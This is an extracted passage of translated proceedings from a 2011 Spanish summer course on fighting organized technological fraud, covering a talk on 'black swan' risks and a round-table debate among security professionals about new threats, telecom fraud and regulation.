  27. 27. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo 27 y presentation has as a common thread the concept of the “Black Swans”, which as stated in the book of Nassim Nicholas, and as handled in the sector, has to do with the impact of the highly improbable. The concept refers to those events that sometimes occur, but are not, at all, predictable. Actually, adapted to our land, we should say “green dogs”, as when it was said in my town that “you are odder than a green dog”. However, this predictability thing is something entirely relative, sine what is predictable for some it is not at all for others. I take as an example the Turkey we eat at Christmas time. Nothing could have led the turkey to think that we will eat it on that date, being so happy and well cared. However, it is something totally predictable for the one who will cook the dinner. Unpredictable with high impact In this context of the unpredictable, the most interesting for us are the things and events that besides being unpredictable have a great impact on our Organization. So to understand how we arrived to this part, we can analyze how the risk analysis works according to the schemes of cold and hot areas. Area one, the hotter, raises the existence of a high probability and high impact. They are things THE RISK OF THE UNPREDICTABLE: “THE BLACK SWANS” José Antonio Mañas (Professor at the School of Telecommunications Engineering. University of Madrid)
  28. 28. Centro de Investigación para la Gestión Tecnológica del Riesgo28 The technological fight against the organized fraud 2011 Summer Course that occur often and that, moreover, “hurt”. This is, undoubtedly, the first thing we have to face as the responsible people of security of our Organization. As we descend down below area one, the high frequency of events remains, but not the impact, which is starting to decrease. We don’t usually talk about all this because it doesn’t have more effects, but they are what we can call “annoying flies”. Approaching the warmer area, with less likely things and with less impact, the so–called level 2... here we must decide what we do and what we risk. We think of what benefit we get and look at, for example, what the competition does. In this section, our action is often solved by the regulator and the regulations that apply. After these two areas, we would be at area three, where we come across with events that besides to occur rarely, also are not important. In my opinion, there is no problem forgetting these events. Or otherwise consider them “opportunities” rather than risks. And the fact is that we always have to look at risk from the perspective of the benefit that brings us to assume it, it is always necessary to make a business estimate. You’ll take on a risk if there is a potential benefit; otherwise, you won’t. Finally we have section four, where the following two conditions take place: it occurs very rarely; but, however, it has a high impact if it happens. That is outlined in the expression “whatever comes, God willing” * in SME language. But if you are in a bigger company, it is inevitable to be aware of everything that could happen even if it is something completely remote. When you say very low probability is to talk about extremely infrequent events; those others not impossible, but never observed; and those that, although possible, we have tackled preventively to make them virtually impossible. The latter refers to what is our action as responsible for security and boarding made on barriers of security, cryptography, centers of support, etc. Although, be careful with what is observed. Because what we don’t see in a place or in an environment can happen in another. As the “Black Swan”, not observed in any place, at any time, and yet it appears somewhere else in the world. Calculating probability? At this point, the big question is if we can calculate the probability, if we can do a risk analysis, and if we can reach the “midpoint effect”, which is everything that occurs many times. Here we must take into account that experience predicts only what is more likely and that the Gaussian curve requires lots of observations, which in my opinion leads to the concept of extreme uncertainty and tells us that it is unlikely to happen. Thus, when we are talking about a singular object, there is no valid statistic and here we are not able to predict. And with regard to that experience
  29. 29. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo 29 can only predict what is likely, we must note that this depends on, in any case, the subject, the own experience, the situation, etc. We also have to talk about what is unlikely, remotely to happen, and where the impact is uncertain. We do not know what will happen, but we suspect that it may have a costly impact for the business and our assets. Here there is no experience of our own or someone else’s, and we can consider ourselves as part of the problem. Here, as Heraclitus said “into the same river we enter and don’t enter, because we are and are not”, nothing is like the first time; the river is not the same because the water runs and then we can never bathe twice in the same river. We are in the uncertain cases, in that impact. *Note from the Translator: Spanish saying “Que sea lo que Dios quiera”. In these cases, we begin analyzing our own reaction in the race against impact, and the external reaction. The reaction of Shareholders, customers (which can be very loyal, but can also opt to penalize you when the slightest impact is detected), the public authorities (which sometimes seem to do nothing and other times seem to contribute generating even more alarm) and society (where you can be in a public trial without big guarantees, where they wonder if you take advantage of the situation, if you’ve done everything possible, etc.). The framework where we are has a mathematical model of hard to know probability and another of difficult to safeguard impact, therefore all the plans and predictions should be done with a “certain amount of art”. In this scenario of risk management the first thing to consider is to prevent everything that we can prevent, provided that cost is justified, where we could deal with actions of management, risk prevention, impact limitation, etc. It is also important a second issue, considering the expected disaster scenarios, if the incident was predictable. Thirdly, regarding risk management we have to consider the crisis management itself. Here we can talk about four things: ...the predictive indicators (from the causes we can predict what is going to happen.) For example in amber traffic lights, we know that the red color follows. (Nevertheless, we have to be careful with these indicators, because they seldom occur); ...the alarm detection and escalation (we must have detectors, with a controlled chain of them…) (“don’t tell me you’ve changed the mobile phone number and I don’t have the new one”, and take special care with the so called false positives, which may “harden” and prevent us from detecting the problems later when they happen); ...the management of those affected (whether information technology systems, the business itself, customers, providers, supply chain or society…); ...and the recovery to bring the business back to its usual practice (here we have our disaster
  30. 30. Centro de Investigación para la Gestión Tecnológica del Riesgo30 The technological fight against the organized fraud 2011 Summer Course recovery plan, the backup systems… and that is because “business as usual” no longer exists). The incident management When it comes to dealing with the management of the incident, there are two options: either we have a passive attitude or the way we handle the conflict is reactive. If our way of interacting is passive, then we cannot remain impassive to see how it evolves the disaster. This carries a high level of paralysis, as what we said SMEs “which is what God wants”. If, on the contrary, our attitude is reactive, which I think is the least we have to start with, we can either stop it so it doesn’t become serious or redirect it to make the most of it. The same thing happened to the classic firm Levi Strauss, which began selling fabrics to make tents and one day the ship with all of the fabrics sank. The way that crisis was managed resulted in the adventure of the brand as a firm of the well-known jeans. Once we reach the disaster, we still have different options too, which will lead us to different results. It may be that we return to where we were before the aforementioned happens, being able to apply different disaster recovery plans; we can take advantage of the new opportunities coming up in front us. Within this context, we can also learn to anticipate these disasters and react according to what most interests us, being always able to learn from the experience. And above all, a fundamental question: do we leave as Managers the same blind people that failed to anticipate this disaster? There will be no choice but to answer this question, although the definitive answer many times will depend only on the company stakeholders. Regulation and compliance In the regulation and enforcement section, we often find the assumption of “fast” responses to scenarios that, perhaps, never will happen; but many times we have no option but doing so. Complying with the different regulations responds to several tasks that we cannot disdain, as calming the social alarm; but it is also true that it is quite complicated to validate its effect, since it’ is a rapid intervention in an unpredictable process. In other words, we do not know if we can measure it, we cannot validate whether we do is correct or not, this is called “feedback system”, from the point of view that we often legislate under much pressure to an event that may happen every 300 years, for example. On the other hand, and inevitably, regulations serve to make companies take certain measures that otherwise would not assume. This is what is known as “fear of failure to comply”. There are many reasons that make a Corporation not to hesitate to comply with those regulations affecting them. Among others we can highlight
  31. 31. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo 31 the following: staying out of the market, if you are in a regulated field; or, of course, we must avoid being caught “without doing our homework” in case of an unpredictable incident; and, much less, to end up in prison. Protect and diversify That being so, the best solution to survive a severe incident, which can have a high impact on the business, is “not putting all the eggs in the same basket”, what is meant by diversifying (clients, services, segmenting the market, etc.). But in order to understand how we arrived at this point and why, we have to go through a tour before that illustrates this development. We have to talk about what we’ll call “business forecasters”, and which, in turn, are split into two categories: exposed and protected, a philosophy where we’d place this theory of diversification and segmentation. Starting from the beginning, and within the mentioned “forecasters”, the greatest impact of all possible happens when, as I said before, we have put “all the eggs in the same basket”, when everything is interconnected and vulnerable to an attack at the same time. We are also more exposed when we have not defined properly the safety margin, where you were recommended to put several doors and hide away, by segregating networks or designing a DMZ cloud. In short, you win much with these lines of defense, which can be deployed throughout your organization. We take advantage of alarms, and the advantage they give us against risks. And this is very important to take into account, despite the fact that these safety margins are often costly and complex. Here it is also important to make a reference to resource optimization, something we resort to on many occasions, even more so in times of economic recession as those we live now. This is important and it has its advantages, of course, but also puts us in the following position: precisely because we are optimal we end up being more fragile against the attacker, and our vulnerability can scupper many achievements obtained with so much effort. The “rapid spread” condition also plays against us, when any vulnerability or attack means the imminent arrival to our systems and the rapid expansion through our networks and infrastructure. The physical security people have this more controlled, and always advocate avoiding these fast propagations, by resorting to what they call “retarders”. I take as an example, in case of fire, the use of fire-retardant materials in the construction of certain facilities or as part of the clothing of those who have to perform rescue tasks; in the end, the idea is to delay the spread effect of the fire. And following the example provided by the physical security, in our departments of logical security we must go beyond installing a password,
  32. 32. Centro de Investigación para la Gestión Tecnológica del Riesgo32 The technological fight against the organized fraud 2011 Summer Course a token, etc., and think about the ability to spread of a threat that reaches that route. And we should always take into account the dynamics and the versatility of the incidents, because if we see them we will be able to adapt to them and fight against their effects. However, when we look at the dynamics topic, the most important problem that I see is globalization, so that an incident may reach our systems more quickly than before and from any part of the globe. In addition, we always have to see if there are watertight compartments, and bear in mind that what we often do is, simply, to foresee an isolated incident, but not the concurrence of several of them. And in relation to cloud computing, I have to say that I’m very afraid of the use of cryptography in these environments, because if we have the impact bounded we are protected, but we aren’t otherwise. Summarizing the above-mentioned and to make it clear what would be the elements and actions that allow to have the assets of an organization protected, we shall return to the subject of bounded impact and the diversification of actions, which I stated as “not putting all the eggs in the same basket”. In the same way, it is necessary to have an adequate safety margin, with layers of defense, systems redundancy and resilience capacity. This last capacity, to keep the essential services after the attack and recover as soon as possible from the same, it is what defines the self- preservation quality of an organization, as well as its adaptability to a changing environment. Finally, I should like to make the following point: the responsibility for the risk is located in the person who has to make decisions, who can be the Director of the company, and not the operator or systems manager. We have clearly seen this in the National Security Scheme approach. And finally, the fact that one makes decisions and another one assumes the consequences must not happen. Decisions must be made by the people who will suffer the consequences. Finally, I highlight the following: there are a number of risks that more or less we know of, we don’t even know of other risks, we can find ourselves in situations that we wouldn’t want to be, but we failed to foresee them… and we must have a solution for that day. This is why it is also important that when production managers design the service portfolio, they include the risk analysis of each service. I think that this may be a good target for 2012.
  33. 33. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo 33 David Barroso S21sec Director e-Crime (Currently head of Security Intelligence AN DLAB. Telefónica Digital) I would change the title of the table and would rather call it “old threats”, because, deep down, what we are experiencing today is no more than a copy of what we were suffering six or eight years ago. Though we might consider it as new platforms (for example, smartphones), rather than as new or old threats; and, mainly, as new players. All this coupled with a situation where we continue to be supported on unsafe foundations and are failing in the way to address these threats. Regarding the fact that we support our philosophy of security on unsafe foundations, suffice it to say that we are still talking about TCPIP, SMTPs, IDSs; we are still using passwords; we invent new words like “clouds”, but they already were here before; we are facing attacks that incorporate social engineering. In essence, we have the usual threats. What has changed is the way they reach us. We also fail in the way to address threats, because we are not going to the root of the problem, but patching on patches. We talk about mobile phones, but they are still unsafe (downloading an application that may have a Trojan horse). This roundtable was intended to discuss whether there are any new threats or only, and so far, new scenarios. It had the following participants: David Barroso, Fernando García Vicent, Juan Jesús León Cobos, Elena Maestre García, Alfonso Martín Palma, Rafael Ortega García, Thomas Roy Catalá, Juan Salom Clotet, Marta Villén Sotomayor and Marcos Gómez Hidalgo, chaired by José de la Peña (director of the SIC magazine). ROUND TABLE. NEW THREATS
  34. 34. Centro de Investigación para la Gestión Tecnológica del Riesgo34 The technological fight against the organized fraud 2011 Summer Course So, as I said, instead of talking about new threats I’d talk about “new players”, where we can highlight the organized groups that we came to know so far; the threat arising from the citizenry itself, as Anonymous has demonstrated; or related to Governments, which also play a role in Internet attacks. At the end, user training is the most important thing and without further steps in this direction we cannot fight neither new nor old threats. Fernando García Vicent Director, information security and SOC. Group Mnemo In my opinion, and trying to link up with what Mr. Barroso have just raised, we are not only encountering a new level playing field and players, but also, in addition, they are also more and more professional, which leads us to a change of direction from cybercrime to cyberterrorism. In other words, I think that we have gone from attacks of economic motivation to other attacks where there are already other interests, more focused on doing real damage, as we have seen in some denial of service and Nation vs. Nation actions. In this position, I would like to stress two points, which could be interesting for discussion. The first is the importance of security holes prevention within the organization, to struggle with fraud. And as any hole usually comes from an illegal action that in turn comes from inside and it materializes by releasing information to the outside. In other words, most of attacks that we have registered had their root, for example, in an internal phishing, using professional networks such as LinkedIn. That is why it is important to know what is happening within the organization to prevent information leaks. And it is important to pay particular attention to the security perimeter and threats arising from mobile devices, which are already a very important dynamic element. Secondly, we must talk about verification of authenticity and code signature of applications that are being downloaded. And, even, the use of digital signature techniques and signature verification on transactions from mobile devices; if used together, they can provide more light than individually. Having said all that, I also stress the importance of defining global strategies for the detected threats and that are of global scope. Here there are two elements: one, championed by leading analysts of the market, which is sharing information, related to the establishment of procedures of intelligence to know what happens and how the attackers move; the incorporation of on-line detection techniques and scoring tools so we can somehow see when fraud occurs; and another: the product of the sum of analysis tools to obtain measurements, indicators of how such threats are occurring. And finally, there are the so-called “Internet of people” and “Internet of things”.
  35. 35. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo 35 Juan Jesús León Cobos Product Manager. GMV solutions global Internet SA I agree with what has been said: instead of new technologies this is about the existence of new players. However, in my opinion, in recent years we do have seen new things. And, in fact, I think that there has been a change that affects the three different types of threats we know: which pursue money or profit (cybercrime), those looking for power (cyberterrorism or cyber- espionage) and which simply seek to “annoy” (cyber-anarchist). In regards to cybercrime, everything has gone very quickly. There has been consolidation of malware, it seems that they are organizing a kind of monopoly system to better manage their evil, and here they defeated us a bit. While we have technology to fight against the “bad guys” (robust authentication, modern end point security, etc.), it is difficult that organizations follow the pace of technology, while the criminals do follow the pace of technology. In my opinion, they have everything they need. Regarding the cyber-anarchist, which is a new phenomenon and orchestrated by new things like social networks, I think that it will be the threat making more progress over the next years. And I think, also, that it is very difficult to combat. We only can prevent it, and not at all, and for any action we will need much intelligence. They can do much damage by attacking the clouds and by his anti-establishment philosophy; they can also infiltrate social networks and take control. And I think that many Governments could also infiltrate to keep track of them and be more aware of the new scenarios of cyberterrorism and cyber- espionage Finally, we can also refer to a new term, coined by an excellent professional, Javier Osuna, which is cyberdemocracy, which is defined as a mechanism of reaction of the “good people” who are in social networks to combat, in a collaborative way, these anti-establishment people who can be so negative. Elena Maestre García Partner of PwC Head of Technological Risks I am going to refer to three fundamental issues: the definition of what the new threats are and their relationship with fraud; what I call the seven dilemmas of the threat evolution; and finally, how I see some conclusions and the challenge of responding to fraud. Regarding the first scenario, when we say new fraud-related threats we refer to unlawful acts which pursue profit (which, moreover, can be direct or indirect, or what I call “incubator of ideas”, allowing third parties to take advantage to commit criminal acts). So, in essence, when we refer to new threats we talk about two things: a question of capacity,
  36. 36. Centro de Investigación para la Gestión Tecnológica del Riesgo36 The technological fight against the organized fraud 2011 Summer Course which today has much to do with technological advances: and, on the other hand, aspects related to intentionality. In regards to the seven dilemmas of the threats evolution, these are as follows: a first driver that has to do with advances in technology and communications, which have advanced so rapidly that it has opened up new security breaches, now with a single blow to the whole world; changes in the operation and the way of doing business, as, for example, on-line recruitment, which open new routes for fraud; the rise of information poured into social networks, and, above all, in a less professional environment and of lower level of rigor; the aspect of globalization, as the fourth factor, where it is easier to learn and replicate attacks, and harder to put barriers to an interconnected world; anonymity, which introduces certain amount of impunity when it comes to commit an offence; the professionalization and industrialization on the hacker’s side, where there are already organized networks willing to pay big money for sensitive data; and, in the seventh and last place, cost, the fact that in some environments fraud has a ROI. I would like also to mention the massive penetration of the cyberattacks; since, according to some studies, 80% of the companies that we know have admitted some act of cyberattack. And this is no longer a concern exclusively of businesses, but also at governmental scale, and also affects the protection of critical infrastructures. Therefore, in view of this situation, I believe that the responses must change. We must evolve towards a new way of managing these threats, beyond the strict perimeter protection. Actually we must take a more proactive position in the fight against fraud, assuming that the challenge is on the fronts of information analysis, so we need to increase the knowledge and the behavioral patterns on conducts. Other aspects would be the demonstration of these situations of fraud, many times something very complex; the aspect regarding investments, which are never enough; and the dynamics of business, where it is often difficult to put reasonable security levels to avoid fraud. Alfonso Martín Palma Head of Cybersecurity INDRA In our Organization, when it comes to identify new threats related to technological fraud, we focus on three aspects: the techniques used to attack; the technologies that are being attacked, and the change in profile of the attacker. Regarding the techniques used to attack, we think that while new threats have emerged, the fact is that the counterattack matter is mature enough. There is no doubt that we need more investment, and that the attackers are becoming more sophisticated; but we can also argue that our level of response has increased in strength and maturity.
  37. 37. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo 37 On the other hand, mobility, social networks or the geolocation are some of the new technologies targeted by the latest attacks. What is also called “the Internet of things” and the critical infrastructures, where an attack would allow taking control of assets as significant as running water, electricity power or natural gas, and communications. In my opinion, there is a risk in all these scenarios, as in many cases cost savings and ease of use have more priority than security, and this can sometimes lead us to a system more vulnerable than before. The change of the profile of the attacker is posing a more drastic change in the current situation of attacks. We are facing traditional terrorist groups, but also groups of cyber-anarchists, the anti- establishment people, and inside these we see the so-called “outraged”. The best of these groups is the great mobilization capacity of the like-minded people, which at any given time can perform combined simultaneous attacks. And, finally, cyber-defense and cyberwarfare will be the biggest changes in this landscape in the coming years. There are already acts of war in the cyberspace, it is already known that Russia was behind the attacks on Estonia, we also know that the Chinese are very active although they are more based on the side of espionage, actions on the Canada channel or in Canadian ports have been already detected to control sea traffic… or the actions developed by the United States or Israel, or jointly, to get Iran’s nuclear program damaged. Here cyberwarfare is already mixed with the protection of critical infrastructures. In these circumstances, what we have to do is to change our strategy and invest more in cyber- intelligence, and thus take advantage of all the experience, both in the virtual world and the physical world. And moreover, I consider it is essential that Nations begin to consider technological fraud as a matter of national defense. It is necessary that the Nation guarantees the security of citizens and enterprises when any of them operate on the Internet. I think that it should be something not only linked to the business world, it should not be just the responsibility of the companies in the sector, but also governmental. Just as we have services such as the police department, army, fire department, etc., also the Government can ensure our rights and interests in this area. Thus the first steps have already been taken. U.S. and NATO have their own cyber-defense Centre, and in many other Western countries are launching similar initiatives. Rafael Ortega García Advisory Partner at Ernst Young (Currently responsible for the area of Governance, Risk and IT security of Solium) Honestly, I have no idea of how to raise the advent of the future based on the vision of what we have now. What I believe is that we face a major problem hindering progress, and the fact is that we have been 20 years with the same security model.
  38. 38. Centro de Investigación para la Gestión Tecnológica del Riesgo38 The technological fight against the organized fraud 2011 Summer Course With the emergence of the Internet and data protection, we have created a very comfortable environment, where I handle the analysis of risks management, my ISMS, my compliance, and my vulnerability management, and there I am quiet. And, on top of that, I’m subcontracting. And this comfortable environment is the problem, because it creates a false sense of security, which in many cases makes us difficult to approach an environment of uncertainty, where we really should be to grow. The key is that we must stay and handle in an environment of uncertainty. And for that to happen we must maintain a state of permanent alertness, prepared for an impossible. On the other hand, I also believe that we have made a lighter security, and now the “bulls” that are approaching us are bigger. Now we create predictive models, but for this we must have saved historical records…, but how many do we have saved? And this is one of the main fronts where the security people have thrown ourselves into and now have to make a stop. At the same time the key question in these points is the team, the human factor that can fight and give answers to what is coming… and this is only provided by the experience, training, and continuous education. Thomas Roy Catalá Director of the area of Quality, Security and Relations with suppliers. Centre for telecommunications and information technology (CTTI) Generalitat de Catalunya From my perspective, there are new threats; and within them, another problem, which amounts to a challenge to solve: a big budget cut amid the crisis, which generates big risks of viability to the type of projects and services that should be provided and how to fit into this. Another threat is coming from the creation of transformation processes and services, and technological transformation processes, which are summarized in the motto “more for less and better”; and, in addition, we are also having problems of obsolescence of applications and maintenance of services. They are threats, therefore, which we are not used to (in Catalonia we are, for the first time since last year, in a situation where there is no economic growth), and against those the CESICAT (Centro de Seguridad de la Información de Cataluña), with its Computer Crime Unit, cannot fight. Now, we are monitoring social networks to find indications of new movements and criminal actions. In this sense, we cannot obviate the attacks we suffered, just like other agencies, coming from citizen groups. We suffer from different types of attacks, such as those concerning the data integrity, the image of the Agency, of economic type or denial of service.
  39. 39. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo 39 Apart from all this, there is a threat that worries me especially and it is the one concerning critical infrastructures. Here there is a criticism that I would like to make, because ICTs are not included in the plans of civil protection, however heavy snowfalls, floods, etc., are included. ICT are never considered, and it would be interesting to raise in these scenarios the recovery and resilience of ICT. And secondly, I also advocate the development of an action plan when the ICTs are the factor of attack. In other words, we develop a recovery plan when the attack, as is happening now, is targeted against the business. In essence, we should focus our efforts, in this order: critical infrastructures, business continuity, and services assurance. And after this, two very important topics we have been dealing with from the security area, the applications performance and the infrastructures. And we have the challenges of the logs management and the monitoring. I think that times will change. It is true that we have lived a period of comfort, but these attacks will put the head of security in a position of responsibility, leading him/her to make decisions. Here I make a very brief reflection: all companies that hold assets define people responsible to protect them and ensure that they will be supported over time (may be money, the human resources part, etc.), but there is one that remains largely unprotected: information, maybe because the CISO is not fulfilling his/her job. Juan Salom Clotet Major of the Civil Guard and Head of the Group of Telematic Crime (currently Director of International Security of the Santander group) I am going to talk about two scenarios which for me are two new threats in the technological fraud. The first is the socialization of technological fraud and the second is on-line gaming. With regard to the first point, and this can be a priori contradictory with what was said here about the specialization, I believe that we have gone from that particular pairing we saw between hackers and specialized crime to exploit the electronic banking (today I already think we can say that the banks have won the battle, minimizing the impact of these frauds) to the fact that currently they do not need money nor being organized to commit a crime of technological fraud. The business of malware is designed and sold at a very low price, as demonstrated by, for example, the “Operation Mariposa”, where some kids had bought some botnets for 500 euros, able to control an incredible quantity of systems. We are no longer talking about organized groups, but about small groups who buy malware, a botnet, or another tool, and exploit them. We are lowering the fraud to the mini-fraud, where the victims are multiplying. And this is focusing, mostly, on e-commerce. And we are witnessing an important movement of loss of confidence in the entire system, in the businesses, in the Internet.
  40. 40. Centro de Investigación para la Gestión Tecnológica del Riesgo40 The technological fight against the organized fraud 2011 Summer Course On the other hand, and as I pointed out before, the second stage of technological fraud is online gaming, which is not regulated, neither for the services delivery nor for the fiscal aspect, even though we have introduced an Internet gaming law; but in my view is very open and lacks regulatory development. From our unit at the Civil Guard we have lived situations that either become a money laundering scene for other criminal acts, or carry out criminal practices in the game itself. Here it is very difficult to keep track, because gaming is ruled by multinationals or groups that operate internationally, and safeguard the profits fleeing to tax havens of the network. Marta Villén Sotomayor Department of Logical Security and Fraud Prevention. Telefónica Spain I’m going to talk about a very specific case, the fraud we suffer from in the telecommunications operators. How it has changed in recent years and how now is becoming a fraud to the customer, not the operator. We talk about micro-frauds and a large number of clients. The first documented case of telephone fraud was dated in 1958, carried out by a young American 9 year old blind to the Bell Company. He discovered that a specific sound activated the PBX programming mode, and so he called for free. After that, we came to a time where the mafias carried out detailed attacks to an operator, or several; but now the picture has changed. Before we were fighting against a fraud of establishment of booths, and now they are real sinks of traffic on the network, where fictitious traffic for the “bad guys” enrichment is performed. Last month we suffered an attack where several telecom operators were involved. The fraud was originated by Vodafone phones calling en masse to a single Movistar phone which had automatic call forwarding to a Telstra phone, which in turn made an international routing ending in a French operator… Call diversion has been the latest scourge to all operators, and fortunately we didn’t allow it for international call, which has freed us from some fraud. And how are these frauds carried out? It’s very simple. There is a whole marketing industry of specific devices for such a task, which can cost 400 euros. Machines like Simbox, the Pool GSM mode… In addition, they have mechanisms to be able to rotate the SIM cards so they avoid seeming criminal, so that all the detection and patterns algorithms we had are no longer useful. Their power is noteworthy; they can send up to 42,000 messages within 24 hours. But now, as I pointed out, what they are doing is to attack directly the customers. I take as examples
  41. 41. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo 41 the following two: last year we had an average of one attack per day on the switchboards of customers, where they compromised the security and charged them calls; and the recent attacks on two social networks. In one of them, Tuenti, they made a phishing spreading among the contacts to obtain a fraudulent subscription. Marcos Gómez Hidalgo Assistant Director of programs. Operations office. National Institute of Communication Technology (INTECO) From the 15,000 Incidents that INTECO usually solve per year, related to end users and SMEs, nearly 40% deal with electronic fraud issues, about 7,000. Of these, more than 90% deal with attacks based on social engineering. This being so, and according to a study on fraud, carried out in the last quarter of 2010, 53% of users declared to have been victims of an attempt (not necessarily accomplished) of fraud in the last 3 months, highlighting the invitation to visit a suspicious website (35% of the cases), fraud through email (26%) and through suspicious job offers (21%). On the other hand, among the forms that the issuers of suspicious communications take, we highlight the banking identity theft, e-commerce and buying and selling webpages and online lottery and gaming. Even so we are optimistic, 95% of Internet users said not having suffered economic damage in those last three months (and those who have suffered from it, in an amount not greater than 400 euros). In addition, the number of banking Trojan horses has been reduced throughout 2010 in almost 4 percent, staying at 39%. We have not registered many micro-frauds on mobile devices. Social networks, on their part, together with mobility, are the real crux of the matter for us. And on top of this, at government level, we have the protection of critical infrastructures, where we work actively with ENISA (European Network and Information Security Agency). However, I continue to emphasize our work in threat detection, which also follows the lead in Europe. The European Commission has created a CERT, named EUCERT, (though it still doesn’t have the competences and objectives defined), we hope it will do a work of coordination bearing fruit soon. We also have to highlight the Cyber-exercises. The first European cyber-exercise was carried out in 2010, where more than 400 incidents were solved in real time; and in 2011 it was carried out along with the US Homeland Security Department. In our country, the Spanish Security Strategy stands out, where we have collaborated on the drafting of the chapter on cyber-security, in which appear the roles of the administrations that will be devoted to protect in cyber-security the citizen, the companies, the country... and in which we will see future Royal Decrees articulating this issue.
  42. 42. Centro de Investigación para la Gestión Tecnológica del Riesgo42 The technological fight against the organized fraud 2011 Summer Course DEBATE To what extent is compatible to combat new threats with reduced budgets, as we now have? Tomás Roy Catalá: when you have to make a budget reduction it does not mean that everything, and always, will have to be reduced. In the end it is a matter of common sense. For example, we have avoided redundancy, and make the most of the security capacities of the network devices. And how do you make also the reduction in RD compatible with this budget reduction? Fernando García Vicent: The level of threats existing today, makes us to be more effective and efficient. We cannot continue to pose the same methods as before; and also requires us to have more knowledge of the technology and available devices. It also demands us more efficiency in each organization’s internal business processes. Have you turned into something positive the attacks suffered in your organizations to achieve greater valuation and justify the need for greater budgetary allocation? Marta Villén Sotomayor: I really think so. We must take advantage of these incidents to further raise the awareness of senior management. Tomás Roy Catalá: It has created us a level of high interaction and a greater awareness; on this side very well. Although I would like to make it clear that we have to assume responsibilities in any case, not delegate them and act in case of crisis. Marcos Gómez Hidalgo: We have been reactive, and I say this with regret. And I think it is much better to present our Department by the incidents that we have avoided, and not by other type of news. Are we losing the battle against the “dark side”? Marta Villén Sotomayor: In my opinion, we have not lost it. I think it is a very difficult battle, and always keeps us active and innovating. Juan Salom Clotet: I think they win by a mile. Because we have tools to fight, but the problem is that the “bad guys” work with impunity. In addition, we look at the large sums, but really this scenario is riddled with small offences, where often they don’t reach 400 euros. TomásRoyCatalá: Regarding the “dark side” I have to say two things: not all are crimes, as demonstrated by some actions of organized citizen groups; and I think that we must seek other channels, because there has been a certain manipulation in this game to go against public institutions. Rafael Ortega García: The fight has always existed and will continue to exist. I am as pessimistic as Juan Salom on the legislative part, but I also believe that this makes the technology evolve. However, the offences that do not come to light are what matters most to me, remaining inside the company. Fernando García Vicent: I would add to the feeling of impunity the big lack of awareness that seems to exist in society and enterprises.
  43. 43. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo 43 David Barroso: They are quite ahead of us and are more determined. And we are not creating tougher laws to compensate. Marcos Gómez Hidalgo: It is also a matter of image, with figures such as the Cyber-Czar of the security. More than 40% of the attacks come from the US... they come to stop to Europe, but we are not going to stop things there. How do you see the role of regulators in the field of information security? Rafael Ortega García: Europe is hyper-regulated, so I think that either we minimize the transpositions, for example, or it is impossible to deploy them. I would like to count on a regulation by sector, and it would be enough. Elena Garcia Maestre: It is important to regulate and define some common frameworks for action and homogenization, always with a dose of reality, without it being “regulate for the sake of it”. And, in addition, we should be more exquisite, because I see an over-regulation that is never supervised. Fernando García Vicent: The legislation will be always behind. We require a work of coordination and implementation from the States, both at local and European levels. Alfonso Martín Palma: It is surprising that there are sectors where there is no regulation to the effect, especially in the US, as in the nuclear field. I believe there must be impositions in the field of regulation, because, as we know, if things are optional, they will be applied seldom, if ever.
  44. 44. Centro de Investigación para la Gestión Tecnológica del Riesgo44 The technological fight against the organized fraud 2011 Summer Course
  45. 45. 2011 Summer Course The technological fight against the organized fraud Centro de Investigación para la Gestión Tecnológica del Riesgo 45 THE RISE OF CYBERCRIME: HOW LAGGING SECURITY MEASURES FUEL THE GROWTH IN ORGANIZED FRAUD ybercrime has increased dramatically over the past years even though the strength of the inhibitors has also increased, such as a greater security and a more fruitful international cooperation to fight it. Although certainly, there are also more and more powerful drivers that promote the ease of attacks, such as the ubiquity of Internet, the advent of electronic commerce and the emergence of a identity market, that have essentially brought new vulnerabilities. The identity market subject is especially complex and harmful. Here the hackers specialized in stealing identities from the banks to sell them later in the market where the fraudulent card manufacturers used them. They resorted to the recruitment of people from within the Organization, using the privileges of the people in networks. And there they got organized in large fraudulent companies dedicated to buying and selling identities and specific tools. The problem here is that anyone who has access to the information becomes a potential thief. But that can no longer be so, because it is as though you could not trust anyone. We are entering the phase of what we call hacking of business processes. And what can somehow Richard Stiennon (Chief Research Analyst. IT Harvest)